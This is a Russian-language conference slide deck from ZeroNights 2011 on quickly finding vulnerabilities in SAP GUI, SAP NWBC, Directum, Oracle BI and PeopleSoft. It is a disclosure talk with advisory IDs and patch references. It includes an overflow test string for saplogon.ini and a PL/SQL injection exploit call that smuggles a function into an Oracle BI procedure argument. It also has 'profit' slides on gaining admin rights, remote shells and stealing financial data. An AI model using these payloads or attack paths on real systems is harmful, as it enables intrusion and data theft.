Upload
defconrussia
View
1.154
Download
3
Embed Size (px)
DESCRIPTION
International Security Conference "ZeroNights 2011" - http://www.zeronights.org/
Citation preview
Не трогай,
а то развалится:
взлом бизнес приложений в экстремальных условиях
© 2002—2011, Digital Security
Александр Поляков
Технический Директор Digital Security
Intro
2 © 2002—2011 Digital Security
Множество бизнес приложений, которые хранят такие важные для вас данные,
совершенно не разрабатывались с учётом хоть каких-либо требований безопасной
разработки и тестирования.
Да, конечно, уязвимости есть везде, но не такие, и обнаружить их далеко не так
просто. Все уязвимости, представленные в данной презентации, были обнаружены
в течение 5 минут после запуска программы, мной и коллегами в свободное от
работы время, в самолёте, поезде или гостинице, когда нет интернета, нет
привычного окружения вроде фаззероф, снифферов и отладчиков или банального
интерпретатора perl, а есть только блокнот и установленный софт. Такое вот
небольшое руководство по поиску уязвимостей в экстремальных условиях на живых
примерах. Кто будет подопытным? Я думаю, вам знакомы эти имена: Documentum,
1C, SAP, PeopleSoft, Oracle BI. Время еще есть, список может и пополниться.
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
SAP - 74% компаний из Forbes 500
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
Пример 1: Ломаем SAPGUI
4 © 2002—2010, Digital Security
• Простая задача - найти уязвимость формата файлов.
• Цель: SAP Gui
• Тип : File format overflow
• Условия: Быстро
• Подходы:
• Ручной Fuzzing
• Автоматизированный Fuzzing
взлом бизнес приложений в экстремальных условиях
Saplogon.ini (конфигурационный файл) ~ 50 параметров
5 © 2002—2010, Digital Security
[Configuration]
SessManNewKey=4
.
[Description]
Item1=192.168.187.63
Item2=ECC5
Item3=solman
[Address]
Item1=
Item2=
Item3=
[MSSysName]
Item1=DM0
Item2=ERP
Item3=SM1
[MSSrvName]
Item1=
Item2=
Item.
.
.
.
взлом бизнес приложений в экстремальных условиях
Результат : DSECRG-11-017
5 © 2002—2010, Digital Security
[MSSysName]
Item1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
0x41414141 and I don’t need anything more
6
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Profit
6
• Файл входит в дистрибутив, распространяемый про сети
• Дистрибутив обычно лежит на файл-сервере
• Иногда даже с доступом на запись!
• Подмена файла и получение прав администратора на рабочих
станциях
• Далее все зависти от ваших желаний)
взлом бизнес приложений в экстремальных условиях
Результат : DSECRG-11-017 Автор – Дмитрий Частухин. Закрыто в обновлении: SapNote 1504547
Пример 2 Ломаем SAP NWBC (NetWeaver Business Client)
4 © 2002—2010, Digital Security
• Задача: скоротать время в самалёте
• Цель: SAP NWBC
• Тип : ActiveX overflow
• Условия: Comraider всегда с собой )
• Подходы:
• Fuzzing
взлом бизнес приложений в экстремальных условиях
Сдался
4 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Profit
6
• Safe for scripting
• Эксплоит даёт удалённый шелл на атакуемом клиенте
• Спасибо Лёше Синцову
взлом бизнес приложений в экстремальных условиях
Результат : DSECRG-11-010 Автор – Александр Поляков + Алексей Синцов. Закрыто в обновлении: SapNote 1519966
3 © 2002—2010, Digital Security
DIRECTUM — система класса ECM (Enterprise Content Management),
обеспечивающая прозрачность управления компанией
и повышающая эффективность работы всех ее сотрудников.
Множество крупных клиентов: Сургутнефтегазбанк, Газпром
трансгаз Чайковcкий, Правительство Тюменской области, Парламент
Республики Калмыкия, "Региональный банк развития……………
взлом бизнес приложений в экстремальных условиях
Система документооборота Directum
4 © 2002—2010, Digital Security
• Задача: скоротать время в поезде москва-спб
• Цель: Directum ECM
• Уязвимость:
• Условия: рабочий ноутбук, блокнот
• Подходы:
• Анализ формата и ручной Fuzzing
взлом бизнес приложений в экстремальных условиях
Результат
4 © 2002—2010, Digital Security
• Уязвимость обнаружена
• Формат файла хранения документов
• Показать не могу (responsible disclose)
Все кому интересно предлагаю обсудить
проблемы разглашения уязвимостей на
панельной дискуссии.
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Profit
6
• Файл с эксплоитом загружается в СЭД
• Доверие к системе гораздо выше, чем у левой ссылки по почте
• При открытии срабатывает эксплоит
• Удобно таргетировать
взлом бизнес приложений в экстремальных условиях
Результат : DSECRG-11-??? Автор – Александр Поляков Закрыто в обновлении: пока не закрыто
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
Неа не слышал?
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
Что хранится?
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
Пример 3: Oracle BI
4 © 2002—2010, Digital Security
• Ситуация: Гостиница в одном богом забытом городе
• Цель: Oracle BI внутренние процедуры СУБД
• Под рукой: время, Oracle Database PL/SQL Fuzzing Tool
• Подходы:
• Автоматизированный Fuzzing
взлом бизнес приложений в экстремальных условиях
Результат: после первого запуска порядка 10 потенциальных дыр
:
© 2002—2010, Digital Security
PL/SQL Injection in OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID
6
• Доступна на выполнение всем (Public)
• Запущена от роли OWBREPOS_OWNER.
• Доступны права:
• 1. SELECT ANY DICTIONARY
• 2. JAVA_ADMIN
• 3. CREATE EXTERNAL JOB
• 4 CREATE ANY DIRECTORY
• Не DBA, но зато может выполнять команды OC
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Анализируем уязвимость
6
Запустим:
> exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('bbbbbbbbbbb','ccccccccc','ddddd');
Прочтём логи:
> select sql_text from v$sql where sql_text like '%bbb%';
Результат логов:
> INSERT INTO OWB$$$_SOLVE_GROUP_IDS(CUBE_NAME, MEASURE_NAME, SOLVE_GROUP_ID)
VALUES('bbbbbbbbbbb', 'ccccccccc', 'ddddd')
Запускаем эксплоит:
>exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SQLI()||''aaa','bbb','bbb');
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Profit
6
• Полный доступ к ОС и чтение СУБД
• Качаем любые данные (к примеру финансовую отчётность)
• Идём играть на биржу
взлом бизнес приложений в экстремальных условиях
WARNING! Данные действия попадают
под целый ряд статуе УК РФ
Результат : DSECRG-11-020 Автор – Александр Поляков Закрыто в обновлении: CPU April 2011
3 © 2002—2010, Digital Security
взлом бизнес приложений в экстремальных условиях
система управления персоналом
© 2002—2010, Digital Security
Inurl:/psp/ps/?cmd=login
8
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Переполнение в поле Password!
9
Основные проблемы безопасности систем ДБО
Пример 5: Oracle Peoplesoft
© 2002—2010, Digital Security
К сожалению только DOS
9
Основные проблемы безопасности систем ДБО
Результат : DSECRG-11-??? Автор – Андрей Лабунец Закрыто в обновлении: CPU April 2011
© 2002—2010, Digital Security 6
взлом бизнес приложений в экстремальных условиях
© 2002—2010, Digital Security
Итоги
6
• Мы постоянно в поисках уязвимостей это больше чем работа
• Бизнес приложения на данный момент имеют крайне низкий
уровень защищённости
• Данная область становится популярнее с каждым годом
• Профессионалы в дефиците
взлом бизнес приложений в экстремальных условиях